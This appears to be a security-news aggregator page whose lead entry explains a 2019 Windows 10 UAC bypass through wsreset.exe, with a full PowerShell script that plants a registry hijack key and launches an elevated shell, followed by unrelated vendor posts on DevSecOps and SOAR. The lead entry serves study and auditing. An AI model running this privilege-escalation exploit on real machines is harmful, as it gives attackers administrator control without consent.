Security Posts

Hacking Windows: UAC bypass on Windows 10 through the Windows Store

Un informático en el lado del mal - 1 hour 6 mins ago
2017 and 2018 were probably the years of the UAC bypass. On this blog we covered many of them: mocking trusted directories, fileless bypasses, bypasses via DLL hijacking, and so on. There is a long catalogue of UAC bypass techniques on this blog. Moreover, from the Ideas Locas team in the CDO area we released a tool for researching, detecting, exploiting and mitigating UAC bypasses, called UAC-A-Mola. The tool was presented at Black Hat Europe 2017.

Figure 1: Hacking Windows: UAC bypass on Windows 10 through the Windows Store
I had set UAC bypasses aside for a while, although I kept following the news closely and saw that new techniques kept appearing. The goal is to find new ways of hacking Windows 10. Today I will talk about a UAC bypass that was published in March 2019 and was "patched" by Microsoft in May 2019. What is interesting about this bypass is that, if you have been following the articles and have read the paper the Ideas Locas team published, you will see that the bypass covered here is very easy to understand and to pull off.

Figure 2: The book "Hacking Windows: Ataques a sistemas y redes Microsoft" from 0xWord
What is more, one of the things UAC-A-Mola set out to do from the start was to help researchers find candidate binaries and discover new UAC bypasses in an automated way. Do not forget this article, in which we discussed that point in depth.

Figure 3: UAC Bypass & Research with UAC-A-Mola, from ElevenPaths
What does this new UAC bypass consist of? It is a fileless bypass: nothing has to be written to disk to obtain execution in a high integrity context. The interesting part is that it works on Windows 10 and, as you will see, it is not hard at all to understand or to reproduce, bearing in mind that it has since been patched.

Playing with UAC bypasses in 2019 too

The first thing is to have a candidate binary. In this case it is a Windows 10 binary called wsreset.exe, which belongs to the Windows Store. We use sigcheck to look at the binary's signature and at whether the "autoElevate" directive in its embedded manifest is set to "True" (sigcheck's -m switch dumps the manifest). The AppInfo service only auto-elevates Microsoft-signed executables living in a trusted directory such as System32, so both conditions have to hold. Here they do, so the binary is potentially bypassable.

Figure 4: autoElevate is set to True
Now it is time to analyse what wsreset.exe looks for in the file system or in the registry and does not find when it runs. With procmon.exe we can monitor the actions a process performs in different areas: file system, network, registry... In short, one of our favourites among the Pentesting with PowerShell scripts you should know in detail.

Figure 5: The book "Pentesting con PowerShell", 2nd edition, from 0xWord
Applying several filters in the tool, among them monitoring only registry activity, a process name of wsreset.exe and a result of 'NAME NOT FOUND', we find something interesting: a key is looked up under HKCR that does not exist and that is meant to point at a binary.

Figure 6: NAME NOT FOUND results for WSReset.exe
In Microsoft's documentation we find something interesting: since Windows 2000, HKCR is a merged view of HKCU\Software\Classes and HKLM\Software\Classes. Furthermore, if a value exists in both subkeys, the one in HKCU\Software\Classes takes precedence. Interesting? Looking at the procmon output, the registry path queried is

HKCR\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command

To check whether it really exists we have to look at:

HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command

If it exists, we can change the '(Default)' value and point it wherever we want. If it does not exist, we can create the structure ourselves: a user can write under their own HKCU\Software\Classes without any elevation, and the merged HKCR view will pick it up.

When creating the path, make sure that DelegateExecute is present and set to an empty string "", so that the shell does not hand execution off to a COM handler and instead runs the command line in '(Default)'. In the '(Default)' value, specify the binary you want to launch. For this example a plain cmd.exe is used, but you can use other things to spawn Meterpreter sessions or our iBombshell, among others.

Figure 7: Modifying the (Default) value
Once the registry path is created and configured with the binary, wsreset.exe can be invoked. Logically, and as we have always said, this makes sense within the post-exploitation phase of an ethical hacking engagement: the moment we have a compromised machine and the conditions are right (the compromised user is a member of the local Administrators group and their session runs at medium integrity; for a standard user there is nothing to bypass), a UAC bypass through a remote shell gives us a new privileged session. Easy to use from Metasploit.

Figure 8: The books "Metasploit para Pentesters", 4th edition, and "Hacking con Metasploit: Advanced Pentesting"
Now we open a cmd.exe and look at the integrity level of the process (remember our beloved MicEnum from ElevenPaths) with the command whoami /groups. In this image you can see that the cmd.exe is running at medium integrity.

Figure 9: Integrity level of the process
From this cmd.exe we run wsreset.exe and see that a new window opens corresponding to the Windows Store binary. In a normal run, after launching wsreset.exe the graphical Windows Store would open.

Figure 10: Running WSReset.exe
As you can see in the next image, we get a window which, once it closes, opens a cmd.exe. This is important, because that process is running at high integrity.

Figure 11: High integrity level
This new cmd.exe runs at high integrity, which means that from it we can impersonate SYSTEM and take complete control of the machine. At no point did UAC prompt to block or warn about the privilege elevation. To obtain this information, run the command whoami /groups.

Figure 12: PoC of the UAC bypass on Windows 10 through the Windows Store
Without doubt it is a simple UAC bypass, but a useful one. Moreover, as has been reported, it was patched recently, at the end of May. Either way, we will surely see it soon in our iBombShell and in other exploitation and post-exploitation tools. We leave you a video demonstrating the bypass.
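The whole procedure above (signature and autoElevate check, planting the key, launching WSReset.exe, verifying the integrity level) as one PowerShell script. This is an added example written for this page; it is not code from the post, from UAC-A-Mola or from iBombShell. It assumes a lab VM on a Windows 10 build from before the May 2019 fix, a local Administrators account whose session runs at medium integrity with UAC at its default level, and that the manifest embedded in WSReset.exe is stored as plain XML in the resource section (so a raw byte scan for the autoElevate element stands in for sigcheck -m). The function names and the audit/cleanup helpers are my additions; the registry path is the one the post reports from procmon.

```powershell
# Added example for this page (not code from the post, UAC-A-Mola or iBombShell).
# Reproduces the WSReset.exe UAC bypass in a lab VM and cleans up afterwards.
# Assumptions: Windows 10 build from before the May 2019 fix, a local
# Administrators account whose session runs at medium integrity, UAC at its
# default level. Run from a normal (non-elevated) PowerShell window.

$WSReset   = Join-Path $env:SystemRoot 'System32\WSReset.exe'
$AppXRoot  = 'HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2'   # path reported by procmon in the post
$HijackKey = Join-Path $AppXRoot 'Shell\open\command'
$Payload   = Join-Path $env:SystemRoot 'System32\cmd.exe'   # swap for your own post-exploitation binary

function Test-AutoElevateBinary {
    # Step 1 of the post (sigcheck): Microsoft-signed and autoElevate=true in the manifest.
    # Assumption: the embedded manifest is stored as plain XML in the resource
    # section, so a raw byte scan finds the element without parsing PE resources.
    param([Parameter(Mandatory)][string]$Path)
    $sig  = Get-AuthenticodeSignature -FilePath $Path
    $text = [Text.Encoding]::ASCII.GetString([IO.File]::ReadAllBytes($Path))
    [pscustomobject]@{
        Path        = $Path
        SignedValid = ($sig.Status -eq 'Valid')
        Signer      = $sig.SignerCertificate.Subject
        AutoElevate = ($text -match '<autoElevate>\s*true\s*</autoElevate>')
    }
}

function Get-IntegrityLevel {
    # Same check as "whoami /groups" in the post, matched on the label SID so it
    # does not depend on the display language of the OS.
    $rows = whoami /groups /fo csv | ConvertFrom-Csv
    $sid  = ($rows | Where-Object { $_.SID -like 'S-1-16-*' } | Select-Object -First 1).SID
    switch ($sid) {
        'S-1-16-4096'  { 'Low' }
        'S-1-16-8192'  { 'Medium' }
        'S-1-16-12288' { 'High' }
        'S-1-16-16384' { 'System' }
        default        { "Unknown ($sid)" }
    }
}

function Install-WSResetHijack {
    # Step 3 of the post: create the key WSReset.exe looks up but does not find.
    # HKCU\Software\Classes is writable by the user and wins over HKLM when HKCR
    # is composed, so no elevation is needed to plant it.
    param([Parameter(Mandatory)][string]$Command)
    New-Item -Path $HijackKey -Force | Out-Null
    Set-ItemProperty -Path $HijackKey -Name '(default)'       -Value $Command
    Set-ItemProperty -Path $HijackKey -Name 'DelegateExecute' -Value ''
}

function Get-WSResetHijack {
    # Audit helper (my addition): on a clean system the key is absent; if it is
    # present, (default) is what would run with high integrity.
    if (-not (Test-Path $HijackKey)) { return $null }
    Get-ItemProperty -Path $HijackKey | Select-Object '(default)', 'DelegateExecute'
}

function Remove-WSResetHijack {
    # Cleanup so the lab box is left as it was found.
    if (Test-Path $AppXRoot) { Remove-Item -Path $AppXRoot -Recurse -Force }
}

# --- Walkthrough ---
$info = Test-AutoElevateBinary -Path $WSReset
$info | Format-List
if (-not ($info.SignedValid -and $info.AutoElevate)) {
    throw 'WSReset.exe is not an autoElevate candidate on this build; stop here.'
}

"Integrity level of this shell: $(Get-IntegrityLevel)"      # expected: Medium

Install-WSResetHijack -Command $Payload
Get-WSResetHijack | Format-List                               # shows the planted (default) value

# Step 4: launch the autoElevate binary from the medium-integrity shell and wait
# only for WSReset.exe itself (the spawned cmd.exe is a separate process). On an
# unpatched build the new cmd.exe reports High integrity with "whoami /groups".
$proc = Start-Process -FilePath $WSReset -PassThru
$proc.WaitForExit()

Remove-WSResetHijack
"Hijack key still present: $([bool](Get-WSResetHijack))"     # expected: False
```

Run the planted cmd.exe's own whoami /groups (or call Get-IntegrityLevel from it) to confirm the High label; the script deliberately does not auto-close that window. On a build with the May 2019 fix the key is simply ignored and the Store opens as usual, which makes Get-WSResetHijack the useful part for an audit: the AppX key under HKCU\Software\Classes has no business existing on a clean system.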

Author: Pablo González Pérez (@pablogonzalezpe), author of the books "Metasploit para Pentesters", "Hacking con Metasploit: Advanced Pentesting", "Hacking Windows", "Ethical Hacking", "Got Root" and "Pentesting con Powershell", Microsoft MVP in Security and Security Researcher on the "Ideas Locas" team of Telefónica's CDO unit.
Categories: Security Posts

ISC Stormcast For Wednesday, June 19th 2019 https://isc.sans.edu/podcastdetail.html?id=6546, (Wed, Jun 19th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security Posts

Vision X Best of Show Special Prize at Interop Tokyo 2019

BreakingPoint Labs Blog - 3 hours 36 mins ago
Ixia's Vision X - 2019 Tokyo Interop Best of Show Special Prize Winner  There are a number of…
Categories: Security Posts

How The New TLS1.3 Standard Will Affect Your Encryption Tactics

BreakingPoint Labs Blog - 3 hours 36 mins ago
The IETF released a new version of their encryption standard called RFC 8446 (Transport Layer…
Categories: Security Posts

Why SPAN when you can Tap?

BreakingPoint Labs Blog - 3 hours 36 mins ago
In networking, as is the case with life, there are usually multiple ways of trying to get to the…
Categories: Security Posts

Introducing Ixia’s Newest Packet Broker: Vision X

BreakingPoint Labs Blog - 3 hours 36 mins ago
As the FIFA Women’s World Cup matches start up, you can bet I will be live-streaming games — at…
Categories: Security Posts

Investigating Windows Graphics Vulnerabilities: A Reverse Engineering and Fuzzing Story

BreakingPoint Labs Blog - 3 hours 36 mins ago
Introduction It is not surprising that vulnerabilities targeting Windows applications and…
Categories: Security Posts

Join us at Cisco Live ‘19

BreakingPoint Labs Blog - 3 hours 36 mins ago
The one constant in networking is change, and that usually means a little added complexity, at…
Categories: Security Posts

Game of Vulnerabilities: Bluekeep

BreakingPoint Labs Blog - 3 hours 36 mins ago
If you have been following what’s happening in the field of computer security, or perhaps even if…
Categories: Security Posts

Dynamic Analysis of a Windows Malicious Self-Propagating Binary

BreakingPoint Labs Blog - 3 hours 36 mins ago
Dynamic analysis (execution of malware in a controlled, supervised environment) is one of the most…
Categories: Security Posts

GDPR is here to stay

BreakingPoint Labs Blog - 3 hours 36 mins ago
What is GDPR? General Data Protection Regulation, or GDPR, is a European regulatory package for…
Categories: Security Posts

How To Optimize Your Security Defenses

BreakingPoint Labs Blog - 3 hours 36 mins ago
As I mentioned in a blog a couple months ago, there is an absolute myriad of security architectures…
Categories: Security Posts

Live From Gartner Security & Risk Mgmt Summit: Pair Security Trainings With Technical Controls

Zero in a bit - Tue, 2019/06/18 - 21:24
“We often forget that technology cannot solve the world’s problems.” That was one of the opening lines of Joanna Huisman’s session “Magic Quadrant for Security Awareness Computer-Based Training” at the Gartner Security & Risk Management Summit in National Harbor, MD. While her Magic Quadrant doesn’t address DevSecOps trainings, I took away some valuable lessons that also apply to this area.

20 percent of users will never change behavior, no matter how well you train

Traditional awareness efforts are based on the belief (or hope) that information leads to action. In other words, the problem with trainings is that “awareness” does not automatically result in secure behavior: About 20 percent of learners are never going to do the right thing, no matter how much you train them. Let’s think this through for a moment: 80 percent of your audience will follow your advice to some extent, so you will get an improvement, but 20 percent will not change their behavior. Most security professionals aim to reward users who follow security process but are reluctant to punish the ones who don’t because they don’t want to be the bad guys. Even if they are prepared to go through with punitive actions, it may be counter to corporate culture (and generally not a good teaching practice).

Education is good, but it must be coupled with technical controls

This means that while security awareness does improve your security posture, you still need technical controls in place to mitigate the rest. In the case of DevSecOps, this translates into a combination of secure coding trainings and automated application security testing. The training will reduce vulnerabilities being introduced into the code, which reduces the cost of your DevSecOps program because security defects that never enter the code are understandably much cheaper than those found in production. The security testing serves as a feedback loop for developers and as a gate to stop security defects escaping to production.
At Veracode, we offer courses to teach the fundamentals of secure coding, both as eLearning and live sessions. With Veracode Greenlight, we provide instant feedback on code security as developers are typing code in their IDE. And we provide feedback via ticketing systems and a security gate as part of Veracode Static Analysis. If developers get stuck fixing a vulnerability, they can book our application security consultants for a coaching session to help fix their security defect. Learn more about Veracode’s Developer Training.
Categories: Security Posts

How Not To Prevent a Cyberwar With Russia

Wired: Security - Tue, 2019/06/18 - 17:30
Former cybersecurity officials warn against a path of aggression that could inflame cyberwar rather than deter it.
Categories: Security Posts

The Honeynet Project Workshop 2019 in Innsbruck, Austria

honeyblog - Tue, 2019/06/18 - 16:49

The Honeynet Project Workshop 2019
Hotel Grauer Bär
Universitätsstraße 5-7
6020 Innsbruck, Austria
July 1st–3rd, 2019

https://austria2019.honeynet.org/

Categories: Security Posts

Live From Gartner Security & Risk Mgmt Summit: Running Midsize Enterprise Security

Zero in a bit - Tue, 2019/06/18 - 16:39
Over the past few months, I’ve experienced an increased interest in DevSecOps from midsize enterprises, so I was especially interested in attending Neil Wynne and Paul Furtado’s session “Outlook for Midsize Enterprise Security and Risk Management 2019” at the Gartner Security & Risk Management Summit in National Harbor, MD this week.

57 Percent of Midsize Enterprises Don’t Have a CISO

Gartner defines midsize enterprises as companies with less than $20 million in IT security budget. At that size, they have up to 30 people in IT, which means that 57 percent of this group do not have enough security staff to warrant a CISO. This means the CIO is accountable for cybersecurity in most midsize enterprises. According to Gartner, midsize enterprises spend an average of $1,089 on IT security per employee. About 6 percent of the IT headcount is dedicated to security, so you have to have at least 17 people in IT before you start dedicating a full headcount to security. Below that water mark, it’s only partial headcounts. That’s a lot of security areas to cover for very little headcount, and you can completely forget about 24/7 coverage for security operations. To make things worse, the midsize enterprise is hit even harder by the InfoSec skill gap because they often cannot compete with Fortune 500 salaries and benefits.

How Can Midsize Enterprises Address These Challenges?

Paul Furtado, Sr. Director Analyst at Gartner, recommends the following guidelines for addressing these challenges:
  • Create a baseline: What are you doing today?
  • Know what to protect: You won’t know what to protect if you don’t know what’s critical to the business. Identify your most critical data: PII, IP, partner/customer lists, business-critical applications. If you don't know that, you're spending money in the wrong areas.
  • Know your risk appetite: Categorize all risks by business impact and risk scenario likelihood, then prioritize and decide what’s a level of acceptable risk for the organization.
  • It’s a combined effort: Security is a combination of people, process, and technology.
  • Apply best practices: You are not the first one to set up a security program – learn from others.  
Framing Security Spending With Executive Leadership

Before Paul joined Gartner, he spent decades working in the trenches in midsize enterprises. Most executive leaders ask why they should be spending dollars on security. I loved his response: “I’m not taking a dollar from you, I’m protecting the dollars for you.” This is a great mind shift that I can absolutely see working with executives. I also liked how he boiled down the basics of what a security program must do:
  • Keep bad guys out 
  • Let good guys in
  • Keep the wheels on
I often see security professionals over-rotate on the first item, which is most important to them. However, let’s not forget, items two and three are more important to everyone else in the business!

Be Pragmatic and Don’t Do Everything In-House

With very limited resources, you cannot do everything in-house. You need to outsource some of the work to be successful. Use cloud solutions and vendors that can supply you with specialized knowledge and round-the-clock coverage. As Paul summed it up: “We could do this ourselves, but it’s not a good use of our people.”

A Recipe for a Successful Security Program in Midsize Enterprise

Paul summed up his recommendations as follows:
  • Do the simple things well. This means the more difficult things in IT security become easier. Complexity is the enemy of security. 
  • Start to seriously examine how to leverage your security spending with multiplication platforms.
  • Demand a secure development life cycle and “built-in” security for IT components.
  • Constantly re-evaluate your risk tolerance and your good-enough security comfort level.
  • Investigate emerging security services.
Of course, working in application security, number three resonated most with me, so I’d like to dig into this one a little and tie it back to all of his recommendations.

How to Do DevSecOps in Midsize Enterprises

Key takeaways from Paul’s talk are that you cannot do everything in-house because of lack of headcount and skills shortage in InfoSec. Veracode can help you address both of these challenges. Let’s get to lack of headcount first. Veracode is the only SaaS-native Leader in the Gartner 2019 Magic Quadrant for Application Security Testing, and we have been a Leader for six times in a row. As a midsize enterprise, you don’t have the time to set up and maintain an application security scanning infrastructure, especially if you have to support multiple geographic sites as well as high availability and scalability for critical DevOps teams. Using Veracode is like having DevSecOps on tap: You don’t have to set up any infrastructure so your developers can start scanning on day one. Now let’s discuss skills shortage. If you only have a couple of InfoSec people on your team, you will struggle to offer specialized knowledge for developers who need help remediating specific vulnerabilities in their code, especially if your team covers a broad set of languages. At Veracode, we have a dedicated team of application security consultants that your developers can tap into to get help with their code. In addition, our security program managers can onboard your scrum teams onto our platform and help them automate the security scanning.

Security as a Competitive Advantage

As a midsize enterprise, you are often subject to security scrutiny when selling to the Fortune 500, especially when the value you deliver to your customers involves software, either directly or indirectly. Veracode is the only application security testing vendor to offer the Veracode Verified Program, which helps you show your customers that you take security seriously. Many of our midsize enterprise customers even use their Veracode Verified logo as a competitive advantage. Check out some of these companies in the Veracode Verified Directory.

“You may not have the need today, but it’s well worth doing the research today.”
Categories: Security Posts

How Veracode Supports DevSecOps Methodologies With SaaS-based Application Security

Zero in a bit - Tue, 2019/06/18 - 15:47
Most legacy applications were not developed with security in mind. However, modern businesses and organizations are continuing to undergo digital transformation in order to pursue new business models and revenue channels, as well as giving their customers or constituents a simplified experience. This often means selecting cloud-based tools and solutions that allow for the scalability necessary to provide applications and services to a broad customer base. For example, in 2013, the UK government adopted a Cloud First, or Cloud Native, policy for all technology decisions, making it mandatory to consider cloud solutions before alternatives. This means that government IT professionals must first consider public cloud options, including SaaS models for enterprise IT and back-office functions, as well as Infrastructure as a Service and Platform as a Service. But this dramatic expansion of the application layer introduces new security challenges. In one engagement, Veracode worked with a High Street bank to secure its web application portfolio and uncovered 1,800 websites that had not been inventoried – making its attack surface 50 percent bigger than originally thought. With the growing complexity of IT infrastructures and a shortage of qualified security experts, businesses and government agencies alike need to enlist application security specialists with a deep understanding of the complexity of modern applications. Veracode pioneered static binary analysis to address the security of modern applications, which are often comprised from different teams, languages, frameworks and third-party libraries. This approach allows security and development teams to assess the security posture of entire applications once they’ve been built, rather than analyzing individual pieces of source code and missing some of the potential “cross-platform” exploits. Yet the Veracode Platform offers so much more than its signature static binary analysis. 
“With a growing number of integrations with CI/CD tools and development environments and expanding its coverage to the full software supply chain, Veracode clearly shows the commitment to fully embrace the modern DevOps and DevSecOps methodologies and to address the latest security and compliance challenges,” writes KuppingerCole Lead Analyst Alexei Balaganski. “With the SaaS approach, the company can ensure that customers can start using the platform within hours, and a wide range of support, consulting and training services means they are ready to guide every customer towards the application security best practices as quickly as possible.” To learn more about our approach to supporting modern DevOps and DevSecOps methodologies, and how the Veracode Platform is even easier for software developers to use, download the KuppingerCole Report, Executive View: Veracode Application Security Platform.
Categories: Security Posts

SOAR with AT&T Cybersecurity and Dark Reading

AlienVault Blogs - Tue, 2019/06/18 - 15:00
Watch the full video on our site. If you prefer reading, here’s the full transcript 😊

Terry Sweeney - Contributing Editor, Dark Reading
Sanjay Ramnath - Associate Vice President, Product Marketing, AT&T Cybersecurity

Terry Sweeney: Welcome back to the Dark Reading News Desk. We’re here at the RSA Conference in San Francisco. I’m Terry Sweeney, contributing editor at Dark Reading and I’m delighted today to be joined by Sanjay Ramnath, vice president of product marketing at AT&T Cybersecurity. Sanjay, thanks so much for joining us today.

Sanjay Ramnath: Thanks so much for having me.

Terry Sweeney: This trend of SOAR, security orchestration automation and response, is generating lots of buzz both here at RSA and among InfoSec professionals as well. Kick us off by explaining what SOAR is and how the companies that use it benefit from it.

Sanjay Ramnath: SOAR is a term that was coined by Gartner. SOAR is really a collection of technologies and processes that aim to solve three problems. I think the first problem that the SOAR framework aims to solve is: How do you stay ahead of this constantly evolving threat landscape? How do you stay ahead of a rapidly changing network while the modern attack surface continues to expand and network parameters vanish? You have hybrid environments with on-premises and cloud assets. So one of the core tenets of SOAR is aggregating data, aggregating both threat data and intelligence and network visibility on a single platform so all the downstream operational decisions around security can be fed with this stream of intelligence and data. The second problem that SOAR addresses is complexity in the security ecosystem and infrastructure itself. When you have a really large number of point solutions and products that protect specific threat vectors you have two issues. One is you have a management problem: how do you constantly switch contexts across these different solutions? You also have a problem of too much data and what is called alert fatigue. The SOAR approach attempts to solve this by automating some of the more mundane resource intensive, human intensive, tasks like data analysis and correlation so the security operations teams can be a lot more effective and they don’t get distracted by the noise. They actually focus on what’s important. The third thing that SOAR addresses is incident response. What do you do when an incident happens? What do you do when your network is intruded upon? Do you have the right processes? Do you have the right workflows in place? Do you have the right data for investigations? SOAR brings all of these together. So SOAR is not a single technology or a single product, it’s really a concept or a framework that brings detection, automation, response, orchestration, intelligence and all of that all together under a common set of terminologies.

Terry Sweeney: That’s really helpful and I’m glad you mention automation. It seems like given the volumes of information that have to be analyzed, this is an essential piece of SOAR. Talk a bit more about why it’s critical to have in combating today’s security issues.

Sanjay Ramnath: You’re never going to have enough resources, bandwidth, and skills in security to stay ahead of the cyber criminals and threat landscape. So I think applying automation where it makes sense really helps streamline security operation. As I mentioned earlier, applying automation in terms of taking this really vast amount of data, threat data and converting that into actionable, tactical threat intelligence is the place where techniques and learning can really help. Automation is not the be-all and end-all to everything but it can definitely make the human components more efficient. So if you have human researchers, feeding them a curated set of data that is run through some automated algorithms makes their jobs a lot easier. Similar to the operations side, once you have visibility into your network, once you have the threat intelligence, the process of correlating that, the process of actually making that data and converting it into alerts, of making that data so that your human element, the security practitioners, can quickly take action against the data, automation can help there as well. So rather than trying to wade through the data itself they can focus on the outcome, and they can focus on the response and actions. Then finally yet importantly, in terms of responding to the breaches, responding to incidents, that’s another place automation can help, so the low-hanging fruit, if you will. If you can automate the response actions around that, your human capital, your human resources are free to go address the much bigger problems, where they really have to apply their expertise.

Terry Sweeney: That makes total sense, thanks. So, security information event management, or SIEM, and SOAR – these two acronyms often get used interchangeably, which isn’t completely accurate. Talk about how SIEM and SOAR are different.

Sanjay Ramnath: SIEM is about collecting data and providing a set of tools to manipulate and act on the data. SOAR is about taking SIEM but then also adding the right processes, the right incident response mechanisms, so you can do more with the data. SOAR is a superset in a sense. What you consider SIEM and log management, data management is part of the value chain that SOAR attempts to address.

Terry Sweeney: Talk a bit about how AT&T Cybersecurity has applied SOAR principles to the products and services that it offers.

Sanjay Ramnath: Sure. So AT&T Cybersecurity’s value proposition is three-fold. The first pillar to our value proposition is this concept of threat intelligence, phenomenal threat intelligence as we call it. And the way we drive that is through Alien Labs. We gather threat data from a number of different sources. We have one of the world’s largest crowd-sourced threat intelligence, threat data portals, it’s called Open Threat Exchange. We have the massive visibility and scale of the AT&T network infrastructure itself, and we have a team of researchers, and automation and machine learning, where we can take this really large canvas of diverse data across a number of vectors and convert that into very actionable, tactical threat intelligence. Then we feed that threat intelligence into our platforms, into our security operations teams. So that’s the first tenet. And as I mentioned, a big part of SOAR is automating the process of gathering threat data and converting that threat data into threat intelligence. So it’s a core part of what we provide. The second pillar to our value proposition is this concept of collaborative defense. One of the founding principles for AT&T Cybersecurity is that no single security vendor or no single organization can fight cyber crime on their own. It’s a collective effort. So we’ve invested in bringing together, in integrating best-of-breed solutions, but then adding the right layer of services, consulting, managed services over that so they can work better together. So the concept of integration, in terms of getting crowd sourced threat data and also in terms of bringing an ecosystem of security solutions together and making them work as a unified whole is an important part of this. In fact that’s another element of SOAR: the concept of orchestration and automation and making sure that your operations can be more streamlined. The last pillar that we provide is this concept of security without the seams. Which is the realization that most breaches today don’t happen because any little piece of technology failed. It’s not because you don’t have a firewall or because you don’t have an email gateway. What your attackers are able to do effectively is exploit the seams in security infrastructure, the gaps, the complexity. You have a lot of products, you have a lot of management interfaces, you have a lot of surfaces, on-premises and cloud and SaaS and so on. So seamlessly, or virtually seamlessly integrating and orchestrating people, process, and technology, doing that in a software-defined way with a platform that can abstract, integrate, orchestrate across those different components is part of the value proposition. So if you look at the AT&T portfolio today, we have Cybersecurity Consulting to help our customers understand their risk profiles, understand their vulnerabilities, plan their security posture. We have Managed Security Services so we can manage everything from firewalls to web gateways, to email gateways, application security, endpoints, and mobile and so on. And we have a software defined platform for threat detection and incident response, which acts as the foundation for everything else we do. And then all of this is fed through the threat intelligence that we generate through the Alien Labs framework. So our brand promise implements a lot of the concepts that SOAR is advocating.

Terry Sweeney: Security staffing is, as we know, an ongoing headache for end user organizations. The talent crunch for information security is tight and not going to change anytime soon. SOAR purports to ease some of these staffing challenges. Automation is one piece of it. Talk a little bit about where SOAR can help free up staff to do other things as well.

Sanjay Ramnath: One of the key benefits of SOAR is in streamlining operations and really helping organizations do more with less and I think there are a couple of different aspects to this. Automation really helps to streamline and curate data so as a security practitioner, as a sec ops team, you only see what is really important. So, for example, one of the things that we provide on our unified security management, USM, platform is, we take the data from the network, we take the threat intelligence and then correlate that and start qualifying alerts and ranking them so when a practitioner looks at the dashboard, all they’re seeing are things that are really important. They have a sense of how severe the alert is, they have a sense of the metadata they need to investigate those incidents further, so their job becomes a lot easier. It’s more intelligence and data driven rather than throwing raw data at them and letting them do the work. And then the other area where I think SOAR really helps with the security operations problem is around response automation, around orchestrating breach responses. The other aspect of that is response automation. Can you quickly create a firewall rule to block a certain IP or quarantine a certain endpoint? Can you quickly create a rule to block a certain URL or web proxy and can you do all of this from one place, from one pane of glass so you don’t have to deal with multiple user interfaces? So that’s an aspect to helping streamline the operations part of it. The third aspect is around streamlining the communication, providing reports, providing dashboards, providing as much aggregation as possible in the dashboard so you can have one pane of glass where you can get a view of your entire environment, your security posture, your assets and so on. So again, you can do more with that small team of people.

Terry Sweeney: Bringing intelligence both to the work priorities and also the workflows themselves. Context, the indicators, the potential virulence of a piece of malware for example. Talk a bit about how threat intel gets integrated into SOAR.

Sanjay Ramnath: Threat intelligence feeds detection platforms, threat intelligence feeds data analysis platforms, threat intelligence can feed security operations teams. Teams that look at the alerts and have to take actions, and have to decide whether a certain incident is more severe than the other. So intelligence can feed that as well. So I think threat intelligence is a foundational element to everything that goes above in the stack, from the platform, to the automation, to the orchestration, to the services and the whole sec ops stack.

Terry Sweeney: Which really makes SOAR appropriate for companies of all sizes?

Sanjay Ramnath: I think so. The concept of SOAR I think is appropriate for companies of all sizes. How you choose to implement it depends on the size of the company, the vertical, which stage in the security lifecycle you are. But as a blueprint, if you will, the basic tenets that SOAR advocates and the problems that SOAR is trying to solve, I think apply to organizations of pretty much any size.

Terry Sweeney: Great. Those are some great insights there Sanjay, thank you so much.
Categories: Security Posts

A Plan to Stop Breaches With Dead Simple Database Encryption

Wired: Security - Tue, 2019/06/18 - 15:00
Database giant MongoDB has a new encryption scheme that should help slow the scourge of breaches.
Categories: Security Posts